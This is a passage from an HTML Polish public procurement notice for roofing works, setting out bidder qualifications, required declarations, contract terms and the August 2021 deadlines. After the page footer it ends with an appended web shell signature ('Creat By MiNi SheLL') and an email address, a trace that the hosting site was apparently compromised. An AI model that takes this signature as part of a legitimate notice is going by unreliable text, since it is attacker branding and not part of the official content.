prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>zamawiający nie stawia warunku w powyższym zakresie, 3) sytuacji ekonomicznej lub finansowej: warunek ten będzie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną co najmniej 100 000 zł (słownie: sto tysięcy złotych) brutto,<br/>4)zdolności technicznej lub zawodowej: a) w zakresie doświadczenia: wykonawca spełni<br/>warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej<br/>jedną robotę budowlaną polegającą budowie i/lub remoncie i/lub przebudowie pokrycia<br/>dachowego o wartości robót budowlanych co najmniej 100 000 zł (słownie: sto tysięcy złotych)<br/>brutto, b) w zakresie osób skierowanych do realizacji zamówienia: wykonawca spełni warunek<br/>jeżeli wykaże, że dysponuje lub będzie dysponował na potrzeby realizacji zamówienia<br/>publicznego osobą, która będzie pełniła funkcję kierownika robót budowlanych, posiadającą<br/>określone poniżej uprawnienia i kwalifikacje: -uprawnienia do kierowania robotami budowlanymi<br/>w specjalności konstrukcyjno - budowlanej bez ograniczeń - zgodnie z rozporządzeniem Ministra<br/>Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do<br/>wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz. 831)<br/>lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane w innych<br/>państwach członkowskich UE, w państwach członkowskich Europejskiego Porozumienia o<br/>Wolnym Handlu (EFTA) oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych<br/>przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020<br/>r., poz. 220),- wpis na listę członków właściwej izby samorządu zawodowego, - doświadczenie<br/>zawodowe na stanowisku kierownika budowy lub kierownika robót budowlanych, na co najmniej<br/>dwóch budowach polegających na budowie i/lub remoncie i/lub przebudowie pokrycia<br/>dachowego o wartości robót budowlanych co najmniej 100 000 zł (słownie: sto tysięcy złotych)<br/>brutto. 3. Zamawiający, w stosunku do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej –<br/>dopuszcza łączne spełnianie warunku przez wykonawców. 4.Zamawiający może na każdym<br/>etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia. 5.W przypadku, gdy podmiot trzeci,<br/>którego potencjałem wspiera się wykonawca realizował zamówienie, w zakres którego<br/>wchodziły roboty budowlane określone w punkcie 2 ppkt 4 lit. a wspólnie z innym podmiotem, nie<br/>ubiegającym się o udzielenie zamówienia, zamawiający wymaga, aby podmiot trzeci<br/>udostępniający potencjał wykonawcy faktycznie uczestniczył w realizacji ww. zakresu robót<br/>budowlanych; Z uwagi na brak miejsca w rubryce c.d. umieszczono w sekcji IX – pozostałe<br/>informacje. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r., poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do<br/>udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>– załącznik nr 4 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w<br/>art.125 ust.1 Pzp, w zakresie podstaw wykluczenia z postępowania, o których mowa w:<br/>a) art. 108 ust. 1 pkt 1 - 4 oraz pkt 6 Pzp,<br/>b) art. 109 ust. 1 pkt 4, 5 i 7 Pzp, - załącznik nr 7 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z<br/>robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości,<br/>daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności<br/>informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo<br/>ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej<br/>przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty - załącznik nr 5 do SWZ;<br/>5) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 6 do SWZ;<br/>6) dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę określoną w<br/>rozdziale VII ust. 2 pkt 3 SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Jeżeli wyk.ma siedzibę lub m.zam.poza teryt.RP,zamiast dok., o których mowa w ust. 4 pkt<br/>2,składa dok.lub dok.wystawione w kraju, w którym wyk.ma siedzibę lub m.zam.,potwierdz.odpowiednio, że nie otwarto jego likwidacji ani nie ogł.upadłości. Wystawiony nie wcześniej niż6miesięcy przed upływem terminu składania ofert.2.Jeżeli w kraju,w którym<br/>wyk. ma siedzibę lub miejsce zam., nie wydaje się dok.,o których mowa w ust. 4 pkt 2, zastępuje się je w całości lub części dok.zaw.odpowiednio oświad. wyk.,ze wskazaniem osoby albo osób upr. do jego reprez.,złożone przed notariuszem lub przed org,sądowym,administr. albo org.samorządu zawodowego lub gosp.właściwym ze względu na siedzibę lub miejsce zam.Wyk.<br/>3.Zam. nie wzywa do złożenia podm.Śr.dow.,jeżeli może je uzyskać za pomocą bezpł.i<br/>ogólnodostęp.baz danych,w szczeg.rej. Publ. w rozumieniu ust.z dnia 17 lutego 2005 r. o<br/>inform.działaln.podm. realizujących zad. Publ., o ile wyk.wskazał w ośw.,o którym mowa w<br/>art.125 ust. 1 Pzp dane umożl.dostęp do tych środków;<br/>4.Wyk.nie jest zob.do złożenia podm.<br/>Śr.dow.które zam. posiada,jeżeli wyk. wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>5.W zakresie nieureg.Ust.Pzp lub niniejszą SWZ do oświadczeń i dok.skł.przez<br/>wyk.w postęp.zastosowanie mają w szczeg.przepisy rozp.Ministra Rozwoju Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podm.śr.dow.oraz innych dok. lub ośw.,jakich może żądać<br/>zam.od wyk. oraz rozp. Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.w sprawie spos.<br/>Sporządz.i przekaz.inform.oraz wymagań techn. dla dok.Elektr.oraz śr.komunik.elektron.w<br/>postęp.o udzielenie zam. Publ.lub konkursie.<br/>6.Of. musi zawierać następujące ośw. i dok.:<br/>1)form.Of.wraz z wymaganymi zał.,sporządzony wg wzoru for. Of. Stan.zał.nr 1 do SWZ. W<br/>przypadku złożenia of.na innym for.niż załącznik nr 1 do SWZ, powinien on zawierać wszystkie<br/>wymagane inf.określone w tym zał. Dok. nie podlega uzup;<br/>2) aktualne na dzień składania ofert ośw.o spełnianiu warunków udziału w postęp.oraz o braku<br/>podst.do wykl.z postęp.,o którym mowa w art. 125 ust. 1 Pzp – zgodnie z zał.nr 2 do SWZ.<br/>Ośw.składają odrębnie: Wyk./każdy spośród wyk.wspólnie ubiegających się o udzielenie zam.W<br/>takim przypadku ośw.potwierdza brak podstaw wykluczenia Wyk.oraz spełnianie warunków<br/>udziału w post.w zakresie, w jakim każdy z wyk.wykazuje spełnianie war. udziału w post.<br/>3)Aktualne na dzień składania ofert ośw.o braku podstaw do wykluczenia z postępowania oraz<br/>spełnianiu warunków udziału w postępowaniu, zgodnie z zał.nr 2a do SWZ(wyp.podmiot trzecizałączyć<br/>w przypadku poleganiu na zdolnościach podm.udostęp.zasoby). Wyk., w przypadku<br/>polegania na zdoln.lub sytuacji podm.udostępn.zasoby, przedstawia, wraz z ośw., o którym<br/>mowa w art.125 ust. 1 ustawy Pzp także ośw.podmiotu dostępniającego zasoby, potwierdzające<br/>brak podstaw wykl.tego podm. oraz odpowiednio spełnianie warunków udziału w postęp.lub<br/>kryt.selekcji, w zakresie, w jakim<br/>wyk.powołuje się na jego zasoby.<br/>4) Pisemne zobowiązanie podmiotów do oddania do dyspozycji niezbędnych zasobów na<br/>potrzeby wykonania zamówienia, podpisane przez uprawnionych przedstawicieli tych<br/>podmiotów, wg załącznika nr 3 do SWZ (wypełnia podmiot trzeci- załączyć w przypadku<br/>poleganiu na zdolnościach podmiotów udostępniających zasoby). Wykonawca, który polega na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów.<br/>5) Pełnomocnictwo dla osoby reprezentującej wykonawcę, o ile nie wynika to z innych<br/>dokumentów złożonych przez wykonawcę. W przypadku składania oferty wspólnej należy<br/>załączyć pełnomocnictwo dla podmiotu reprezentującego kilku wykonawców. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w rozdziale IX ust. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we wzorze umowy, stanowiącym załącznik nr 8 do SWZ.<br/>2. Zakres świadczenia wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem<br/>zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 Pzp oraz wskazanym we wzorze umowy,<br/>stanowiącym załącznik nr 8 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy<br/>pisemnej <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-09 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-09 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Warunki udziału w postępowaniu c.d.:<br/>6.W przypadku, gdy zamówienie, w zakres którego wchodzą roboty budowlane (RB), o których<br/>mowa w punkcie 2 ppkt 4 lit. a były realizowane przez wykonawcę wspólnie z in. podm., nie<br/>ubiegającym się o udzielenie zamówienia, zamawiający wymaga, aby wykonawca składający<br/>ofertę w niniejszym postępowaniu faktycznie uczestniczył w realizacji ww. zakresu robót<br/>budowlanych.<br/>7.Jeżeli wykonawca lub podmiot trzeci, którego potencjałem wspiera się wykonawca realizował<br/>zadanie w trybie zapr. i wyb.,zamawiający uzna RB, o której mowa w punkcie 2 ppkt 4 lit. a za<br/>spełniającą warunek, jeżeli robota ta będzie odpowiadała swoim zakresem i wartością<br/>wymogom określonym w punkcie 2<br/>ppkt 4 lit. a.<br/>8.Zamawiający uwzględni tylko zadania prawidłowo ukończone tj. takie, dla których wydano<br/>ostateczne pozw. na użytk. lub – jeżeli pozw. na użytk. nie było wymagane – wobec których<br/>organ nadzoru budowlanego nie wniósł sprzeciwu, o którym mowa w art. 54 ust. 1 ustawy z dnia<br/>7 lipca 1994 r. – Prawo budowlane (tekst jednolity: Dz. U. z 2020 r. poz. 1333 ze zm.) lub dla<br/>których wydano zaświadczenie o braku podstaw do wniesienia sprzeciwu, o którym mowa w art.<br/>54 ust. 2 ustawy Prawo budowlane albo dla których wydano in. równoważny<br/>dokument/dokumenty, zgodnie z przepisami kraju, w którym zostały wykonane wykazywane<br/>roboty budowlane).<br/>9.Zamawiający na etapie składania i oceny ofert nie wymaga, aby osoby posiadające<br/>uprawnienia budowlane, a będące obywatelami państw członkowskich Unii Europejskiej,<br/>Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o Wolnym<br/>Handlu (EFTA) – stron umowy o Europejskim Obszarze Gospodarczym, poza legitymowaniem<br/>się posiadaniem uprawnień budowlanych zdobytych poza terytorium Polski, musiały<br/>dysponować odpowiednią decyzją o uznaniu kwalifikacji zawodowych lub w przypadku braku<br/>decyzji o uznaniu kwalifikacji zawodowych, by spełniły wymagania, o których mowa w art. 20a<br/>ust. 2-6 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierów budownictwa (Dz. U. z 2019 r., poz. 1117 ze zm.), dotyczące świadczenia usług transgr., tj. aby uzyskały one tymczasowy wpis na listę członków właściwej izby samorządu<br/>zawodowego,<br/>10.Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i<br/>w oparciu o przepisy będące podstawą ich nadania. W celu uniknięcia wątpliwości zaleca się<br/>podanie daty wydania uprawnień i dokładne cytowanie zakresu uprawnień z posiadanego<br/>zaświadczenia,<br/>11.Wszystkie osoby przewidziane do realizacji zamówienia muszą biegle posługiwać się<br/>językiem polskim. W przeciwnym wypadku wykonawca udostępni wystarczającą ilość tłumaczy,<br/>wykazujących znajomość języka techn. w zakresie terminologii budowlanej, we wszystkich<br/>specjalnościach występujących przy realizacji zamówienia.<br/>12.Ilekroć w treści SWZ jest mowa o: - „budowie, przebudowie lub rozbudowie albo remoncie” -<br/>należy przez to rozumieć budowę, przebud. lub rozbud. albo remont w rozumieniu ustawy<br/>Prawo budowlane; - „kierowniku budowy”, „kierowniku robót” - należy przez to rozumieć<br/>kierownika budowy lub kierownika robót w rozumieniu ustawy Prawo budowlane.<br/>13. W przypadku, gdy jakakolwiek wartość dotycząca ww. warunków wyrażona będzie w walucie<br/>obcej, zamawiający przeliczy tę wartość w oparciu o średni kurs walut NBP dla danej waluty z<br/>daty wszczęcia postępowania. Za datę wszczęcia postępowania zamawiający uznaje datę<br/>umieszczenia ogłoszenia w miejscu publicznie dostępnym w swojej siedzibie oraz na swojej<br/>stronie internetowej. Jeżeli w tym dniu średni kurs NBP nie będzie opublikowany zamawiający<br/>przyjmie średni kurs z ostatniego dnia przed dniem ogłoszenia. Jeżeli w jakimkolwiek<br/>dokumencie złożonym przez wykonawcę wskazane zostaną kwoty wyrażone w walucie nie<br/>znajdującej się aktualnie w obrocie, zamawiający dokona przeliczenia tych kwot na złotówki na<br/>podstawie ostatniego średniego miesięcznego kursu złotego w stosunku do tych walut,<br/>ujawnionego w Tabeli Kursów NBP</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-20 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com